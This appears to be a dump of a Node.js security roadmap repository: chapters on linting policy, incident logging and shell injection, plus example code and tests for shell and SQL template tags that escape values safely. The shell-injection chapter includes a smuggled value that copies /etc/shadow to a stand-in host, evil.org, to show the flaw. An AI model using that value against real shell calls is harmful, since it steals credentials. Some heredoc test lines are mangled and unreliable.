| 111 | * A **common** policy suitable for all projects that identifies 112 | anti-patterns that are generally regarded as bad practice by the 113 | community with a low false positive rate. 114 | * A **strict** policy suitable for projects that are willing to 115 | deal with some false positives in exchange for identifying more 116 | potential problems. 117 | * An **experimental** policy that projects that want to contribute to 118 | linter policy development can use. 119 | New rules go here first, so that rule maintainers can get feedback 120 | about their impact on real code. 121 | 122 | 123 | ### Decouple Reviews from Development 124 | 125 | Within a large organization, there are often multiple review cycles, some 126 | concurrent: 127 | 128 | - Reviews of designs and use cases where developers gather information 129 | from others. 130 | - Code reviewers critique pull requests for correctness, maintainability, 131 | testability. 132 | - Release candidate reviews where professional testers examine a 133 | partial system and try to break it. 134 | - Pre-launch reviews where legal, security & privacy, and other 135 | concerned parties come to understand the state of the system and 136 | weigh in on what they need to be able to support its deployment. 137 | - Limited releases where trusted users get to use an application. 138 | 139 | Reviews should happen early and late. When designing a system or a 140 | new feature, technical leads should engage specialists. Before 141 | shipping, they should circle back to double check the implementation. 142 | During rapid development though, developers should drive development 143 | — they may ask questions, and may receive feedback (solicited 144 | and not), but ought not have to halt work while they wait for reviews 145 | from specialists. 146 | 147 | Some changes have a higher security impact than other, so 148 | some will require review by security specialists, but not most. 149 | 150 | During an ongoing security review, security specialists can contribute 151 | use cases and test cases; file issues; and help to integrate tools 152 | like linters, fuzzers, and vulnerability scanners. 153 | 154 | As described in "[Keeping your dependencies close][]", new third-party 155 | modules are of particular interest to security specialists, but 156 | shouldn't require security review before developers use them on an 157 | experimental basis. 158 | 159 | There are a many workflows that allows people to work independently 160 | and later circle back so that nothing falls through the cracks. 161 | Below is one that has worked in similar contexts: 162 | 163 | 1. The developer (or the automated import script) files a 164 | tracking issue that is a prerequisite for pre-launch review. 165 | 2. If the developer later finds out that they don't plan on using 166 | the unreviewed module, they can close the tracking issue. 167 | 3. The assigned security specialist asks follow-up questions and 168 | reports their findings via the tracking issue. 169 | 4. A common pre-launch script checks queries a module metadata 170 | databased maintained by security to identify still-unvetted 171 | dependencies. 172 | 173 | [BOF]: ../chapter-1/threat-BOF.md 174 | [CRY]: ../chapter-1/threat-CRY.md 175 | [DEX]: ../chapter-1/threat-DEX.md 176 | [EXF]: ../chapter-1/threat-EXF.md 177 | [LQC]: ../chapter-1/threat-LQC.md 178 | [RCE]: ../chapter-1/threat-RCE.md 179 | [SHP]: ../chapter-1/threat-SHP.md 180 | [QUI]: ../chapter-1/threat-QUI.md 181 | [JSConformance]: https://github.com/google/closure-compiler/wiki/JS-Conformance-Framework 182 | [tslint]: https://palantir.github.io/tslint/develop/custom-rules/ 183 | [eslint]: https://eslint.org/docs/developer-guide/working-with-rules-new#runtime-rules 184 | [Keeping your dependencies close]: ../chapter-4/close_dependencies.md 185 | -------------------------------------------------------------------------------- /chapter-6/failing.md: -------------------------------------------------------------------------------- 1 | # When all else fails 2 | 3 | ## Background 4 | 5 | The ["Incident Handlers Handbook"][SANS] discusses at length how to 6 | respond to security breaches, but the main takeaways are: 7 | 8 | * You need to do work before incidents happen to be able to 9 | respond effectively. 10 | * Similar measures can lower the rate of incidents. 11 | * You will still have incidents. 12 | * Being in a position to respond effectively can limit damage when 13 | incidents occur. 14 | 15 | Node's proposed [security working group][security-wg] 16 | includes in its charter measures to route information about 17 | vulnerabilities and fixes to the right places, and coordinate response 18 | and disclosure. 19 | 20 | Package monitoring services like [nodesecurity], GitHub's 21 | [package graph][github graph], [snyk][], and the 22 | [nodejs-sec list][nodejs-sec] aim to help vulnerability reports get to 23 | those who need them. 24 | 25 | 26 | ## Problem 27 | 28 | Threats: [0DY][] 29 | 30 | Node's security working group is working on a lot of preparedness 31 | issues so we only address a few. 32 | 33 | ### Naming is hard 34 | 35 | Each of the groups mentioned above is doing great work trying to help 36 | patches get to those who need them. Each seems to be rolling their own 37 | naming scheme for vulnerabilities. 38 | 39 | The computer security community has a 40 | [centralized naming scheme][CVE-IDs] for vulnerability reports so that 41 | reports don't fall through the cracks. Security responders rarely 42 | have the luxury of dealing with a single stack much less a single 43 | layer of that stack so mailing lists are not sufficient — if 44 | reporters roll their own naming scheme or only disclose via 45 | unstructured text, reports will fall through the cracks. 46 | 47 | ### Logging 48 | 49 | When trying to diagnose a problem, responders often look to log files. 50 | There has been much written on how to protect logs from 51 | [forgery][log injection]. 52 | 53 | ```js 54 | console.log(s); 55 | ``` 56 | 57 | on a stack node runtime allows an attacker who controls `s` to write 58 | any content to a log. 59 | 60 | ```js 61 | console.log('MyModule: ' + s); 62 | ``` 63 | 64 | is a bit better. An attacker has to insert a newline character into 65 | `s` to forge another modules log prefix, and can't get rid of the 66 | previous one. 67 | 68 | 69 | ## Success Criteria 70 | 71 | Incident responders would have the tools necessary to do their jobs if 72 | 73 | * Security specialists can subscribe to a stream of notifications 74 | that include the vast majority of actionable security disclosures. 75 | * Responders can narrow down which code generated which log entries. 76 | 77 | 78 | ## Possible solutions 79 | 80 | ### Naming 81 | 82 | Use CVE-IDs if at all possible when disclosing a vulnerability. There 83 | is a CNA for Node.js but that doesn't cover non-core npm modules and 84 | other CNAs cover runtime dependencies like OpenSSL. If there is no 85 | other CNA that is appropriate, MITRE will issue an ID. 86 | 87 | ### Logging 88 | 89 | On module load, the builtin `module.js` creates a new version of 90 | `require` for each module so that it can make sure that the module path 91 | gets passed as the module parent parameter. 92 | 93 | The same mechanism could create a distinct `console` logger for each 94 | module that narrows down the source of a message, and makes it 95 | unambiguous where one message ends and the next starts. For example: 96 | 97 | 1. Replace all `/\r\n?/g` in the log message text with `'\n'` 98 | and emit a CRLF after the log message to prevent forgery by 99 | line splitting. 100 | 2. Prefix it with the module filename and a colon. 101 | 102 | With this, an incident responder reading a log message can reliably 103 | tell that the module mentioned is where the log message originated, as 104 | long as the attacker didn't get write access to the log file. 105 | Preventing log deletion by other processes is better handled by 106 | Linux's `FS_APPEND_FL` and similar mechanisms than in node. 107 | 108 | [nodesecurity]: https://nodesecurity.io/advisories 109 | [github graph]: https://github.com/blog/2447-a-more-connected-universe 110 | [snyk]: https://snyk.io/vuln?packageManager=npm 111 | [nodejs-sec]: https://groups.google.com/group/nodejs-sec 112 | [CVE-IDs]: https://en.wikipedia.org/wiki/Common_Vulnerabilities_and_Exposures#CVE_identifiers 113 | [log injection]: https://www.owasp.org/index.php/Log_Injection 114 | [0DY]: ../chapter-1/threats.md 115 | [SANS]: https://www.sans.org/reading-room/whitepapers/incident/incident-handlers-handbook-33901 116 | [security-wg]: https://github.com/nodejs/security-wg 117 | -------------------------------------------------------------------------------- /chapter-7/child-processes.md: -------------------------------------------------------------------------------- 1 | # Shell injection 2 | 3 | Threats: [SHP][] 4 | 5 | The [`shelljs` module][shelljs] allows access to the system 6 | shell. We focus on `shelljs`, but similar arguments apply to builtins 7 | like `child_process.spawn(cmd, { shell: ... })` ([docs][cp.spawn]) and 8 | similar modules. 9 | 10 | `shelljs` has some nice programmatic APIs for common shell commands 11 | that escape arguments. 12 | 13 | It also provides `shell.exec` which allows full access to the shell 14 | including interpretation of shell meta characters. 15 | 16 | Solving [shell injection][SHP] is a much harder problem than query 17 | injection since shell scripts tend to call other shell scripts, so 18 | properly escaping arguments to one script doesn't help if the script 19 | sloppily composes a sub-shell. The problem of tools that trust their 20 | inputs is not limited to shell scripts: see discussion of image decoders 21 | in [BOF][]. 22 | 23 | The [shell grammar][] has more layers of interpretation so is arguably 24 | more complex than any one SQL grammar. 25 | 26 | We can do much better than string concatenation though. The code 27 | below is vulnerable. 28 | 29 | ```js 30 | shelljs.exec("executable '" + x + "'") 31 | ``` 32 | 33 | If an attacker causes 34 | 35 | ```js 36 | x = " '; scp /etc/shadow evil@evil.org/; echo ' "; 37 | ``` 38 | 39 | then what gets passed to the shell is 40 | 41 | ```js 42 | executable ' '; scp /etc/shadow evil@evil.org/; echo ' ' 43 | ``` 44 | 45 | Instead, consider: 46 | 47 | ```js 48 | shelljs.exec`executable ${x}` 49 | 50 | shelljs.exec`executable '${x}'` 51 | ``` 52 | 53 | This use of tagged templates is roughly equivalent to 54 | 55 | ```js 56 | shelljs.exec(["executable ", ""], x) 57 | 58 | shelljs.exec(["executable \'", "\'"], x) 59 | ``` 60 | 61 | This way, when control reaches `shelljs`, it knows which strings came 62 | from the developer: `["executable ", ""]`, and which are inline 63 | expressions: `x`. If `shelljs` properly escapes the latter, it 64 | prevents the breach above. 65 | 66 | The accompanying example ([code][sh-code]) includes a tag 67 | implementation for `sh` and `bash` that recognizes complex nesting 68 | semantics. 69 | 70 | We can't, working within the confines of Node, prevent poorly written 71 | command line tools from breaking when exposed to untrusted inputs, but 72 | we can make sure that we preserve the developer's intent when they 73 | write code that invokes command line tools. For projects that have 74 | legitimate reasons for invoking sub-shells, consistently using 75 | template tags like this solves some problems and makes it more likely 76 | that effort spent hardening command line tools will yield fruit. 77 | 78 | [shell grammar]: http://pubs.opengroup.org/onlinepubs/9699919799/utilities/V3_chap02.html#tag_18_10 79 | [shelljs]: https://www.npmjs.com/package/shelljs 80 | [cp.spawn]: https://nodejs.org/api/child_process.html#child_process_child_process_spawn_command_args_options 81 | [SHP]: ../chapter-1/threat-SHP.md 82 | [BOF]: ../chapter-1/threat-BOF.md 83 | [sh-code]: https://github.com/mikesamuel/sh-template-tag 84 | -------------------------------------------------------------------------------- /chapter-7/examples/sh/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "sh-template-tag", 3 | "description": "string template tags for safely composing shell strings", 4 | "keywords": [ 5 | "shell", 6 | "child_process", 7 | "security", 8 | "injection", 9 | "template", 10 | "template-tag", 11 | "string-template", 12 | "sec-roadmap", 13 | "es6" 14 | ], 15 | "version": "0.0.0", 16 | "author": "Mike Samuel", 17 | "license": "Apache-2.0", 18 | "main": "index.js", 19 | "files": [ 20 | "index.js" 21 | ], 22 | "dependencies": { 23 | "template-tag-common": ">=1.0.2" 24 | }, 25 | "devDependencies": { 26 | "chai": ">=4.1.2", 27 | "eslint": ">=4.15.0", 28 | "eslint-config-strict": "*", 29 | "eslint-config-standard": "*", 30 | "mocha": ">=4.0.1", 31 | "standard": "*" 32 | }, 33 | "scripts": { 34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && ./node_modules/.bin/mocha" 35 | }, 36 | "eslintConfig": { 37 | "extends": [ 38 | "strict", 39 | "standard" 40 | ] 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /chapter-7/examples/sh/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | /* eslint "id-length": off */ 19 | 20 | const { expect } = require('chai') 21 | const { describe, it } = require('mocha') 22 | const { sh, ShFragment, makeLexer } = require('../index') 23 | 24 | /** 25 | * Feeds chunks to the lexer and concatenates contexts. 26 | * Tests that the lexer ends in a valid end state and 27 | * appends '_ERR_' as an end state if not. 28 | */ 29 | function tokens (...chunks) { 30 | const lexer = makeLexer() 31 | const out = [] 32 | for (let i = 0, len = chunks.length; i < len; ++i) { 33 | out.push(lexer(chunks[i])[0] || '_') 34 | } 35 | try { 36 | lexer(null) 37 | } catch (exc) { 38 | out.push('_ERR_') 39 | } 40 | return out.join(',') 41 | } 42 | 43 | // Unwrap an ShFragment, failing if the result is not one. 44 | function unwrap (x) { 45 | if (x instanceof ShFragment) { 46 | return String(x) 47 | } 48 | throw new Error(`Expected ShFragment not ${JSON.stringify(x)}`) 49 | } 50 | 51 | // Run a test multiply to exercise the memoizing code. 52 | function runShTest (golden, test) { 53 | for (let i = 3; --i >= 0;) { 54 | if (golden === '_ERR_') { 55 | expect(test).to.throw() 56 | } else { 57 | expect(unwrap(test())).to.equal(golden) 58 | } 59 | } 60 | } 61 | 62 | describe('sh template tags', () => { 63 | describe('lexer', () => { 64 | it('empty string', () => { 65 | expect(tokens('')).to.equal('_') 66 | }) 67 | it('word', () => { 68 | expect(tokens('foo')).to.equal('_') 69 | }) 70 | it('words', () => { 71 | expect(tokens('foo bar baz')).to.equal('_') 72 | }) 73 | it('words split', () => { 74 | expect(tokens('foo bar', ' ', 'baz')).to.equal('_,_,_') 75 | }) 76 | it('parens', () => { 77 | expect(tokens('foo (bar) baz')).to.equal('_') 78 | }) 79 | it('parens split', () => { 80 | expect('_,_,(,_,_,_').to.equal( 81 | tokens('foo', ', ', '(bar', ')', ' ', 'baz')) 82 | }) 83 | it('parens hanging split', () => { 84 | expect('_,_,(,(,(,_ERR_').to.equal( 85 | tokens('foo', ', ', '(bar', ' ', 'baz')) 86 | }) 87 | it('quotes embed subshell', () => { 88 | expect('",$(,_').to.equal( 89 | tokens(' "foo', '$(bar ', ' baz)" boo')) 90 | }) 91 | it('quotes embed arithshell', () => { 92 | expect('",$((,$((,",_').to.equal( 93 | tokens(' "foo', '$((bar ', '(far)', ' baz))', 'q" boo')) 94 | }) 95 | it('quotes embed backticks', () => { 96 | expect('",`,`,",_').to.equal( 97 | tokens(' "foo', '`bar ', '(far)', ' baz`', 'q" boo')) 98 | }) 99 | it('escape affects subshell', () => { 100 | expect('",",",",_').to.equal( 101 | tokens(' "foo', '\\$((bar ', '(far)', ' baz))', 'q" boo')) 102 | }) 103 | it('single quotes do not embed', () => { 104 | expect(`',',',',_`).to.equal( 105 | tokens( 106 | ' \' $(', 107 | 'foo) $((', 108 | 'bar))', 109 | ' `', 110 | ' ` # \' ')) 111 | }) 112 | it('unterminated comment', () => { 113 | expect('#,_ERR_').to.equal( 114 | tokens(' #foo')) 115 | }) 116 | it('terminated comment', () => { 117 | expect('_').to.equal( 118 | tokens(' #foo\n')) 119 | }) 120 | it('terminated comment split', () => { 121 | expect('#,_').to.equal( 122 | tokens(' #foo', 'bar\n')) 123 | }) 124 | it('arithshell', () => { 125 | expect('_,$((,$((,_,_').to.equal( 126 | tokens('foo', ' $((bar ', '(far)', ' baz))', ' boo')) 127 | }) 128 | it('backticks', () => { 129 | expect('_,`,`,_,_').to.equal( 130 | tokens('foo', '`bar ', '(far)', ' baz`', ' boo')) 131 | }) 132 | it('subshell paren disambiguation', () => { 133 | expect('$(,(,$(,",_,_').to.equal(tokens( 134 | 'echo "$(foo ', ' | (bar ', ' baz)', ' boo)', 'far" | ', '')) 135 | }) 136 | it('hash not after space', () => { 137 | expect('_,_').to.equal( 138 | tokens('echo foo#', '')) 139 | }) 140 | it('hash after space', () => { 141 | expect('#,#,_ERR_').to.equal( 142 | tokens('echo foo #', '')) 143 | }) 144 | it('hash concatenation hazard', () => { 145 | expect(() => tokens('#foo')).to.throw() 146 | }) 147 | it('intermediate concatenation hazard', () => { 148 | expect(() => tokens('echo foo', '#bar')).to.throw() 149 | }) 150 | it('escaped intermediate concatenation hazard', () => { 151 | expect('_,_').to.equal(tokens( 152 | 'echo foo', '\\#bar')) 153 | }) 154 | it('simple heredoc', () => { 155 | expect(tokens('cat < { 158 | // Concatenation hazard when no eol at end 159 | expect(tokens('cat < { 162 | expect(tokens('cat < { 165 | expect(tokens('cat << EOF\nFoo', ' bar\nEOF\n')).to.equal('< { 168 | expect(tokens('cat <<-EOF\nFoo', ' bar\nEOF\n')).to.equal('<<-EOF,_') 169 | }) 170 | it('bad heredoc label', () => { 171 | expect(() => tokens('cat << "EOF"\nFoo bar\nEOF;')).to.throw() 172 | }) 173 | it('missing heredoc label', () => { 174 | expect(() => tokens('cat <<', '\nfoo bar\n', ';')).to.throw() 175 | }) 176 | }) 177 | 178 | const str = 'a"\'\n\\$b' 179 | const numb = 1234 180 | const frag = new ShFragment(' frag ') 181 | describe('template tag', () => { 182 | it('string in top level', () => { 183 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo ${str}`) 184 | }) 185 | it('number in top level', () => { 186 | runShTest(`echo '1234'`, () => sh`echo ${numb}`) 187 | }) 188 | it('fragment in top level', () => { 189 | runShTest(`echo frag `, () => sh`echo ${frag}`) 190 | }) 191 | it('string in dq', () => { 192 | runShTest(`echo "a\\"'\n\\\\\\$b"`, () => sh`echo "${str}"`) 193 | }) 194 | it('number in dq', () => { 195 | runShTest(`echo "1234"`, () => sh`echo "${numb}"`) 196 | }) 197 | it('fragment in dq', () => { 198 | runShTest(`echo " frag "`, () => sh`echo "${frag}"`) 199 | }) 200 | it('string in sq', () => { 201 | runShTest(`echo 'a"'"'"'\n\\$b'`, () => sh`echo '${str}'`) 202 | }) 203 | it('number in sq', () => { 204 | runShTest(`echo '1234'`, () => sh`echo '${numb}'`) 205 | }) 206 | it('fragment in sq', () => { 207 | runShTest(`echo ' frag '`, () => sh`echo '${frag}'`) 208 | }) 209 | it('string in embed', () => { 210 | runShTest( 211 | `echo $(echo 'a"'"'"'\n\\$b')`, 212 | () => sh`echo $(echo ${str})`) 213 | }) 214 | it('number in embed', () => { 215 | runShTest( 216 | `echo $(echo '1234')`, 217 | () => sh`echo $(echo ${numb})`) 218 | }) 219 | it('fragment in embed', () => { 220 | runShTest( 221 | `echo $(echo frag )`, 222 | () => sh`echo $(echo ${frag})`) 223 | }) 224 | it('hash ambig string', () => { 225 | runShTest(`_ERR_`, () => sh`echo foo${str}#bar`) 226 | }) 227 | it('hash ambig fragment', () => { 228 | runShTest(`_ERR_`, () => sh`echo foo${frag}#bar`) 229 | }) 230 | it('heredoc string', () => { 231 | runShTest( 232 | '\ncat < sh` 234 | cat < { 240 | runShTest( 241 | '\ncat < sh` 243 | cat < { 249 | runShTest( 250 | '\ncat < sh` 252 | cat < { 258 | runShTest( 259 | ` 260 | cat < sh` 268 | cat < { 80 | if (errorMessage) { 81 | // Replay the error message if we've already failed. 82 | throw new Error(errorMessage) 83 | } 84 | text = String(text) 85 | while (text) { 86 | const pattern = delimiter 87 | ? DELIMITED_BODIES[delimiter] 88 | : PREFIX_BEFORE_DELIMITER 89 | const match = pattern.exec(text) 90 | if (!match) { 91 | throw new Error( 92 | errorMessage = msg`Failed to lex starting at ${text}`) 93 | } 94 | let nConsumed = match[0].length 95 | if (text.length > nConsumed) { 96 | const chr = text.charAt(nConsumed) 97 | if (delimiter) { 98 | if (chr === delimiter) { 99 | delimiter = null 100 | ++nConsumed 101 | } else { 102 | throw new Error( 103 | errorMessage = msg`Expected ${chr} at ${text}`) 104 | } 105 | } else if (Object.hasOwnProperty.call(DELIMITED_BODIES, chr)) { 106 | delimiter = chr 107 | ++nConsumed 108 | } else { 109 | throw new Error( 110 | errorMessage = msg`Expected delimiter at ${text}`) 111 | } 112 | } 113 | text = text.substring(nConsumed) 114 | } 115 | return delimiter 116 | } 117 | } 118 | 119 | /** A string wrapper that marks its content as a SQL identifier. */ 120 | class Identifier extends TypedString {} 121 | 122 | /** 123 | * A string wrapper that marks its content as a series of 124 | * well-formed SQL tokens. 125 | */ 126 | class SqlFragment extends TypedString {} 127 | 128 | /** 129 | * Analyzes the static parts of the tag content. 130 | * 131 | * @return An record like { delimiters, chunks } 132 | * where delimiter is a contextual cue and chunk is 133 | * the adjusted raw text. 134 | */ 135 | function computeStatic (strings) { 136 | const { raw } = trimCommonWhitespaceFromLines(strings) 137 | 138 | const delimiters = [] 139 | const chunks = [] 140 | 141 | const lexer = makeLexer() 142 | 143 | let delimiter = null 144 | for (let i = 0, len = raw.length; i < len; ++i) { 145 | let chunk = String(raw[i]) 146 | if (delimiter === '`') { 147 | // Treat raw \` in an identifier literal as an ending delimiter. 148 | chunk = chunk.replace(/^([^\\`]|\\[\s\S])*\\`/, '$1`') 149 | } 150 | const newDelimiter = lexer(chunk) 151 | if (newDelimiter === '`' && !delimiter) { 152 | // Treat literal \` outside a string context as starting an 153 | // identifier literal 154 | chunk = chunk.replace( 155 | /((?:^|[^\\])(?:\\\\)*)\\(`(?:[^`\\]|\\[\s\S])*)$/, '$1$2') 156 | } 157 | 158 | chunks.push(chunk) 159 | delimiters.push(newDelimiter) 160 | delimiter = newDelimiter 161 | } 162 | 163 | if (delimiter) { 164 | throw new Error(`Unclosed quoted string: ${delimiter}`) 165 | } 166 | 167 | return { raw, delimiters, chunks } 168 | } 169 | 170 | function interpolateSqlIntoFragment ( 171 | { raw, delimiters, chunks }, strings, values) { 172 | // A buffer to accumulate output. 173 | let [ result ] = chunks 174 | for (let i = 1, len = raw.length; i < len; ++i) { 175 | const chunk = chunks[i] 176 | // The count of values must be 1 less than the surrounding 177 | // chunks of literal text. 178 | if (i !== 0) { 179 | const delimiter = delimiters[i - 1] 180 | const value = values[i - 1] 181 | if (delimiter) { 182 | result += escapeDelimitedValue(value, delimiter) 183 | } else { 184 | result = appendValue(result, value, chunk) 185 | } 186 | } 187 | 188 | result += chunk 189 | } 190 | 191 | return new SqlFragment(result) 192 | } 193 | 194 | function escapeDelimitedValue (value, delimiter) { 195 | if (delimiter === '`') { 196 | return mysql.escapeId(String(value)).replace(/^`|`$/g, '') 197 | } 198 | const escaped = mysql.escape(String(value)) 199 | return escaped.substring(1, escaped.length - 1) 200 | } 201 | 202 | function appendValue (resultBefore, value, chunk) { 203 | let needsSpace = false 204 | let result = resultBefore 205 | const valueArray = Array.isArray(value) ? value : [ value ] 206 | for (let i = 0, nValues = valueArray.length; i < nValues; ++i) { 207 | if (i) { 208 | result += ', ' 209 | } 210 | 211 | const one = valueArray[i] 212 | let valueStr = null 213 | if (one instanceof SqlFragment) { 214 | if (!/(?:^|[\n\r\t ,\x28])$/.test(result)) { 215 | result += ' ' 216 | } 217 | valueStr = one.toString() 218 | needsSpace = i + 1 === nValues 219 | } else if (one instanceof Identifier) { 220 | valueStr = mysql.escapeId(one.toString()) 221 | } else { 222 | // If we need to handle nested arrays, we would recurse here. 223 | valueStr = mysql.format('?', one) 224 | } 225 | result += valueStr 226 | } 227 | 228 | if (needsSpace && chunk && !/^[\n\r\t ,\x29]/.test(chunk)) { 229 | result += ' ' 230 | } 231 | 232 | return result 233 | } 234 | 235 | /** 236 | * Template tag function that contextually autoescapes values 237 | * producing a SqlFragment. 238 | */ 239 | const sql = memoizedTagFunction(computeStatic, interpolateSqlIntoFragment) 240 | 241 | exports.Identifier = Identifier 242 | exports.SqlFragment = SqlFragment 243 | exports.sql = sql 244 | 245 | if (global.it) { 246 | // Expose for testing. 247 | // Harmless if this leaks 248 | exports.makeLexer = makeLexer 249 | } 250 | -------------------------------------------------------------------------------- /chapter-7/examples/sql/package.json: -------------------------------------------------------------------------------- 1 | { 2 | "name": "mysql-template-tag", 3 | "description": "string template tags for safely composing SQL", 4 | "keywords": [ 5 | "sql", 6 | "security", 7 | "injection", 8 | "template", 9 | "template-tag", 10 | "string-template", 11 | "sec-roadmap", 12 | "es6" 13 | ], 14 | "version": "0.0.0", 15 | "author": "Mike Samuel", 16 | "license": "Apache-2.0", 17 | "main": "index.js", 18 | "files": [ 19 | "index.js" 20 | ], 21 | "dependencies": { 22 | "mysql": "2.15.0", 23 | "template-tag-common": ">=1.0.2" 24 | }, 25 | "devDependencies": { 26 | "chai": ">=4.1.2", 27 | "eslint": ">=4.15.0", 28 | "eslint-config-strict": "*", 29 | "eslint-config-standard": "*", 30 | "mocha": ">=4.0.1", 31 | "standard": "*" 32 | }, 33 | "scripts": { 34 | "test": "./node_modules/.bin/standard && ./node_modules/.bin/eslint . && TZ=GMT ./node_modules/.bin/mocha" 35 | }, 36 | "eslintConfig": { 37 | "extends": [ 38 | "strict", 39 | "standard" 40 | ] 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /chapter-7/examples/sql/test/test.js: -------------------------------------------------------------------------------- 1 | /** 2 | * @license 3 | * Copyright 2017 Google LLC 4 | * 5 | * Licensed under the Apache License, Version 2.0 (the "License"); 6 | * you may not use this file except in compliance with the License. 7 | * You may obtain a copy of the License at 8 | * 9 | * https://www.apache.org/licenses/LICENSE-2.0 10 | * 11 | * Unless required by applicable law or agreed to in writing, software 12 | * distributed under the License is distributed on an "AS IS" BASIS, 13 | * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 14 | * See the License for the specific language governing permissions and 15 | * limitations under the License. 16 | */ 17 | 18 | /* eslint "no-magic-numbers": off */ 19 | 20 | const { expect } = require('chai') 21 | const { describe, it } = require('mocha') 22 | const index = require('../index') 23 | 24 | function tokens (...chunks) { 25 | const lexer = index.makeLexer() 26 | const out = [] 27 | for (let i = 0, len = chunks.length; i < len; ++i) { 28 | out.push(lexer(chunks[i]) || '_') 29 | } 30 | return out.join(',') 31 | } 32 | 33 | describe('sql template tags', () => { 34 | describe('lexer', () => { 35 | it('empty string', () => { 36 | expect(tokens('')).to.equal('_') 37 | }) 38 | it('hash comments', () => { 39 | expect(tokens(' # "foo\n', '')).to.equal('_,_') 40 | }) 41 | it('dash comments', () => { 42 | expect(tokens(' -- \'foo\n', '')).to.equal('_,_') 43 | }) 44 | it('block comments', () => { 45 | expect(tokens(' /* `foo */', '')).to.equal('_,_') 46 | }) 47 | it('dq', () => { 48 | expect(tokens('SELECT "foo"')).to.equal('_') 49 | expect(tokens('SELECT `foo`, "foo"')).to.equal('_') 50 | expect(tokens('SELECT "', '"')).to.equal('",_') 51 | expect(tokens('SELECT "x', '"')).to.equal('",_') 52 | expect(tokens('SELECT "\'', '"')).to.equal('",_') 53 | expect(tokens('SELECT "`', '"')).to.equal('",_') 54 | expect(tokens('SELECT """', '"')).to.equal('",_') 55 | expect(tokens('SELECT "\\"', '"')).to.equal('",_') 56 | }) 57 | it('sq', () => { 58 | expect(tokens('SELECT \'foo\'')).to.equal('_') 59 | expect(tokens('SELECT `foo`, \'foo\'')).to.equal('_') 60 | expect(tokens('SELECT \'', '\'')).to.equal('\',_') 61 | expect(tokens('SELECT \'x', '\'')).to.equal('\',_') 62 | expect(tokens('SELECT \'"', '\'')).to.equal('\',_') 63 | expect(tokens('SELECT \'`', '\'')).to.equal('\',_') 64 | expect(tokens('SELECT \'\'\'', '\'')).to.equal('\',_') 65 | expect(tokens('SELECT \'\\\'', '\'')).to.equal('\',_') 66 | }) 67 | it('bq', () => { 68 | expect(tokens('SELECT `foo`')).to.equal('_') 69 | expect(tokens('SELECT "foo", `foo`')).to.equal('_') 70 | expect(tokens('SELECT `', '`')).to.equal('`,_') 71 | expect(tokens('SELECT `x', '`')).to.equal('`,_') 72 | expect(tokens('SELECT `\'', '`')).to.equal('`,_') 73 | expect(tokens('SELECT `"', '`')).to.equal('`,_') 74 | expect(tokens('SELECT ```', '`')).to.equal('`,_') 75 | expect(tokens('SELECT `\\`', '`')).to.equal('`,_') 76 | }) 77 | }) 78 | 79 | function runTagTest (golden, test) { 80 | // Run multiply to test memoization bugs. 81 | for (let i = 3; --i >= 0;) { 82 | let result = test() 83 | if (result instanceof index.SqlFragment) { 84 | result = result.toString() 85 | } else { 86 | throw new Error(`Expected SqlFragment not ${result}`) 87 | } 88 | expect(result).to.equal(golden) 89 | } 90 | } 91 | 92 | describe('sql', () => { 93 | it('numbers', () => { 94 | runTagTest( 95 | 'SELECT 2', 96 | () => index.sql`SELECT ${1 + 1}`) 97 | }) 98 | it('date', () => { 99 | runTagTest( 100 | `SELECT '2000-01-01 00:00:00.000'`, 101 | () => index.sql`SELECT ${new Date(Date.UTC(2000, 0, 1, 0, 0, 0))}`) 102 | }) 103 | it('string', () => { 104 | runTagTest( 105 | `SELECT 'Hello, World!\\n'`, 106 | () => index.sql`SELECT ${'Hello, World!\n'}`) 107 | }) 108 | it('identifier', () => { 109 | runTagTest( 110 | 'SELECT `foo`', 111 | () => index.sql`SELECT ${new index.Identifier('foo')}`) 112 | }) 113 | it('fragment', () => { 114 | const fragment = new index.SqlFragment('1 + 1') 115 | runTagTest( 116 | `SELECT 1 + 1`, 117 | () => index.sql`SELECT ${fragment}`) 118 | }) 119 | it('fragment no token merging', () => { 120 | const fragment = new index.SqlFragment('1 + 1') 121 | runTagTest( 122 | `SELECT 1 + 1 FROM T`, 123 | () => index.sql`SELECT${fragment}FROM T`) 124 | }) 125 | it('string in dq string', () => { 126 | runTagTest( 127 | `SELECT "Hello, World!\\n"`, 128 | () => index.sql`SELECT "Hello, ${'World!'}\n"`) 129 | }) 130 | it('string in sq string', () => { 131 | runTagTest( 132 | `SELECT 'Hello, World!\\n'`, 133 | () => index.sql`SELECT 'Hello, ${'World!'}\n'`) 134 | }) 135 | it('string after string in string', () => { 136 | // The following tests check obliquely that '?' is not 137 | // interpreted as a prepared statement meta-character 138 | // internally. 139 | runTagTest( 140 | `SELECT 'Hello', "World?"`, 141 | () => index.sql`SELECT '${'Hello'}', "World?"`) 142 | }) 143 | it('string before string in string', () => { 144 | runTagTest( 145 | `SELECT 'Hello?', 'World?'`, 146 | () => index.sql`SELECT 'Hello?', '${'World?'}'`) 147 | }) 148 | it('number after string in string', () => { 149 | runTagTest( 150 | `SELECT 'Hello?', 123`, 151 | () => index.sql`SELECT '${'Hello?'}', ${123}`) 152 | }) 153 | it('number before string in string', () => { 154 | runTagTest( 155 | `SELECT 123, 'World?'`, 156 | () => index.sql`SELECT ${123}, '${'World?'}'`) 157 | }) 158 | it('string in identifier', () => { 159 | runTagTest( 160 | 'SELECT `foo`', 161 | () => index.sql`SELECT \`${'foo'}\``) 162 | }) 163 | it('number in identifier', () => { 164 | runTagTest( 165 | 'SELECT `foo_123`', 166 | () => index.sql`SELECT \`foo_${123}\``) 167 | }) 168 | it('array', () => { 169 | const id = new index.Identifier('foo') 170 | const frag = new index.SqlFragment('1 + 1') 171 | const values = [ 123, 'foo', id, frag ] 172 | runTagTest( 